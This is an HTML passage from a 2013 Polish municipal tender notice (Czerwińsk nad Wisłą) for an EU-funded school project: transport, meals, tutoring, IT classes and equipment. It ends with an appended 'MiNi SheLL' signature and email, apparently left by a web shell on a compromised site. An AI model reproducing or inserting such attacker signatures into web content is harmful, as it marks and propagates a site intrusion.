<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ugczerwinsk.bip.org.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czerwińsk nad Wisłą
ul. Wł. Jagiełły 16
09-150 Czerwińsk nad Wisłą.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2013 godzina 08:45, miejsce: Urząd Gminy Czerwińsk nad Wisłą
ul. Wł. Jagiełły 16
09-150 Czerwińsk nad Wisłą
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie w ramach programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Realizacja usługi transportu uczniów ze szkół objętych projektem do miejsc zamieszkania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje realizację usługi transportu uczniów ze szkół objętych projektem do miejsc zamieszkania, po zakończeniu zajęć w ramach projektu (tj. od ok. 16:00).
- Przewidywana tygodniowa liczba kilometrów - 500
- Przewidywana łączna liczba kilometrów nie może przekroczyć 15.000 km.
Wykonawca zobowiązany jest w swojej cenie ofertowej skalkulować :
- Koszt ubezpieczenia przewożonych uczniów od następstw nieszczęśliwych wypadków
- Koszt sprzątania udostępnionych środków transportu
- Koszt własnego ubezpieczenia przewoźnika z tytułu OC deliktowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawę posiłków dla uczniów do szkół objętych projektem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakup i dostawę posiłków dla uczniów do szkół objętych projektem wg szczegółowego harmonogramu ustalonego z Zamawiającym. 
- W skład jednego zestawu posiłkowego wchodzić musi napój (soczek) oraz kanapka. Zalecana jest zmiana (urozmaicenie) rodzajów napojów i rodzajów kanapek w okresach tygodniowych.
- Wykonawca dostarcza zamiennie w ciągu tygodnia: kanapki z masłem i szynką lub kiełbasą, Kanapki z masłem i serem żółtym z dodatkiem warzywa tj. sałaty zielonej/ogórka/pomidora/papryki
- Minimalne wartości wagowe: bułka/chleb-50g, ser żółty: 20-25g, szynka: 20-25g, kiełbasa: 20-25g,masło: ok 10g, napój owocowy niegazowany o zawartości soku min. 30%
- Tygodniowa liczba zestawów - 388 sztuk
Łącznie w ramach zamówienia Zamawiający planuje zakup nie więcej niż 12028 sztuk.
- Przedmiot zamówienia obejmuje zakup (przygotowanie) posiłków oraz ich dostarczanie do poszczególnych szkół objętych projektem w ilościach i terminach uzgodnionych z Zamawiającym.
- Rozliczenia będą dokonywane w cyklu miesięcznym na podstawie ceny jednostkowej za zestaw pomnożonej przez liczbę dostarczonych w danym miesiącu zestawów posiłkowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.40.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prowadzenie zajęć.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje prowadzenie zajęć:
a.	Rozwijających z:
- matematyki - 60h zajęć/grupę, dla 4 grup. 
- przyrody - 60h zajęć/grupę, dla 1 grupy.
- fizyki - 60h zajęć/grupę, dla 4 grup. 
- biologii - 60h zajęć/grupę, dla 4 grup.
- geografii - 60h zajęć/grupę, dla 4 grup.
- chemii - 60h zajęć/grupę, dla 4 grup.
- języka angielskiego - 90h zajęć/grupę z modułem wspomagającym udostępnionym na platformie elerningowej (min. 10h/uczestnika), dla 6 grup. Wykonawca zobowiązany jest do dodatkowego wyposażenia uczestników zajęć w podręczniki i słowniki na własność oraz do organizacji i udostępnienia uczestnikom loginów i haseł do internetowej platformy nauczania zdalnego, na której realizowany będzie komponent elearningowy zajęć na okres realizacji zajęć i kolejnych 2 lat po ich zakończeniu.
- języka angielskiego i niemieckiego - 120h zajęć/grupę z modułem wspomagającym udostępnionym na platformie elerningowej (min. 15h/uczestnika), zakończonych egz. telc (lub równoważnego), dla 3 grup. Wykonawca zobowiązany jest do dodatkowego wyposażenia uczestników zajęć w podręczniki i słowniki na własność oraz do organizacji i udostępnienia uczestnikom loginów i haseł do internetowej platformy nauczania zdalnego na której realizowany będzie komponent elearningowy zajęć na okres realizacji zajęć i kolejnych 2 lat po ich zakończeniu.

b.	wyrównujących z:
- matematyki - 30h zajęć/grupę, dla 5 grup 
- języka polskiego - 30h zajęć/grupę, dla 4 grup. 

c.	z zakresu wsparcia psychologicznego: koncentracja na zadaniu/zastępowanie agresji - 15h/gr dla 3 grup. 

d.	z zakresu doradztwa zawodowego
- grupowe - 15 godzin dla każdej grupy - dla 1 grupy uczniów. 
- indywidualne  - 3 godziny dla każdej osoby - dla 12 uczniów 
e.	z zakresu logopedii - 60h/grupę dla  3 grup..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 20</li>
<li>3. Doświadczenie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prowadzenie zajęć rozwijających i wyrównujących z informatyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje prowadzenie zajęć rozwijających i wyrównujących z informatyki, w tym:
- zajęcia rozwijające - 60h zajęć/grupę, dla 5 grup. 
- zajęcia rozwijające - 120h zajęć/grupę, z modułem wspomagającym udostępnionym na platformie elerningowej (min. 5h/uczestnika), zakończonych egz. ecdl-start (lub równoważnego), dla 3 grup. Wykonawca zobowiązany jest do dodatkowego wyposażenia uczestników zajęć w podręczniki na własność oraz do organizacji i udostępnienia uczestnikom loginów i haseł do internetowej platformy nauczania zdalnego na której realizowany będzie komponent elearningowy zajęć.


Zajęcia będą się odbywać w średniej częstotliwości:
- dla zajęć 120 i 90h /grupę - 4 godziny tygodniowo
- dla zajęć 60 /grupę - 2 godziny tygodniowo
- dla zajęć 30 /grupę - 1 godzina tygodniowo
- dla zajęć 10  i 15/grupę - w blokach 2 oraz 3-godzinnych

Zajęcia prowadzone będą w następujących szkołach:
- Gimnazjum w Czerwińsku nad Wisłą
- Szkoła Podstawowa w Grodźcu;

Przez godzinę lekcyjną Zamawiający rozumie jednostkę w wymiarze 45 minut, za wyjątkiem zajęć logopedycznych dla których wymiar 1 godziny zajęć wynosi 60 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa sprzętu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę następującego sprzętu dla potrzeb prowadzenia zajęć:
a.	Tablica interaktywna - szt 2
b.	Projektor multimedialny -  szt 2
c.	Laptop z systemem operacyjnym i oprogramowaniem Office - szt 2
d.	Ekran rozwijany ze statywem  (do projekcji z projektora) - szt 2

Szczegółowa specyfikacja wymagań minimalnych dotyczących pozycji a. b. i c. zawiera załącznik nr 7 do siwz.
		
- Wszystkie dostarczone sztuki sprzętu muszą być fabrycznie nowe, a wszystkie urządzenia muszą posiadać atesty i certyfikaty dopuszczające do użytku w szkole
- Wykonawca jest zobowiązany by zgłosić Zamawiającemu dostawę najpóźniej na 2 dni robocze przed terminem
- Koszty dostawy ponosi Wykonawca
- W cenie dostawy Wykonawca zobowiązany jest zawrzeć zapoznanie wyznaczonego pracownika danej placówki ze sprzętem (sprawdzenie poprawności funkcjonowania)
- Dostawa wszystkich elementów zamówienia musi nastąpić ni później niż w ciągu 14 dni od podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com